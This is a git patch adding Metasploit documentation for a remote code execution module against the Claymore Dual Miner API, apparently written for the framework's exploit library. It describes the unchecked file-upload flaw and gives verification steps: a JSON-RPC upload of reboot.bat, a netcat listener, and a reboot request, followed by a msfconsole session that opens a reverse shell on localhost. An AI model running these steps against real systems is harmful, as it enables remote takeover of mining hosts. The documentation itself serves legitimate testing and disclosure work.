From 43d71cdc09352ef0b8fdfd6be016d6f588604577 Mon Sep 17 00:00:00 2001
From: ReverseBrain
Date: Mon, 2 Jul 2018 16:02:36 +0200
Subject: [PATCH] Initial Claymore Dual Miner RCE doc commit
---
 .../claymore_dual_miner_remote_manager_rce.md | 48 +++++++++++++++++++
 1 file changed, 48 insertions(+)
 create mode 100644 documentation/modules/exploit/multi/misc/claymore_dual_miner_remote_manager_rce.md
diff --git a/documentation/modules/exploit/multi/misc/claymore_dual_miner_remote_manager_rce.md b/documentation/modules/exploit/multi/misc/claymore_dual_miner_remote_manager_rce.md
new file mode 100644
index 0000000000..37ee541574
--- /dev/null
+++ b/documentation/modules/exploit/multi/misc/claymore_dual_miner_remote_manager_rce.md
@@ -0,0 +1,48 @@
+## Description
+
+This module connects to the Claymore Dual Miner API server to exploit the RCE.
+This module can target the remote system if the miner is running with read/write mode enabled.
+
+## Vulnerable Application
+
+[Claymore Dual Miner](https://github.com/nanopool/Claymore-Dual-Miner) allows an user to control the miner
+configuration by uploading files inside its directory using the server API. Since there is no check on file names, an attacker
+can exploit this vulnerability by uploading a reboot.bat or reboot.sh file and execute it via Remote Manager GUI.
+
+## Verification Steps
+
+1. Start the vulnerable software: `EthDcrMiner64.exe -epool eth-eu1.nanopool.org:9999 -ewal 0x83718eb67761Cf59E116B92A8F5B6CFE28A186E2 -epsw x -mode 1 -ftime 10 -mport 3333`
+2. Run on terminal: `{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["reboot.bat", "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"]}`
+3. Run on terminal: `nc -lvp 1234`
+4. Run on terminal: `echo -e '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}\n' | nc 127.0.0.1 3333 && echo`
+5. You should get a shell
+
+## Options
+
+ **RHOST**
+
+ Remote Host
+
+ **RPORT**
+
+ Remote port the vulnerable software is running at, default is 3333.
+
+
+### Remote target
+
+ ```
+ msf5 > use exploit/multi/misc/claymore_dual_miner_remote_manager_rce
+ msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > set rhost 127.0.0.1
+ rhost => 127.0.0.1
+ msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > set lhost 127.0.0.1
+ lhost => 127.0.0.1
+ msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rcee) > set lport 1234
+ lport => 1234
+ msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > exploit
+
+ [*] Started reverse TCP handler on 127.0.0.1:1234
+ [*] Command shell session 1 opened (127.0.0.1:1234 -> 127.0.0.1:3333) at 2018-07-02 18:43:41 +0000
+
+ whoami
+ reversebrain
+ ```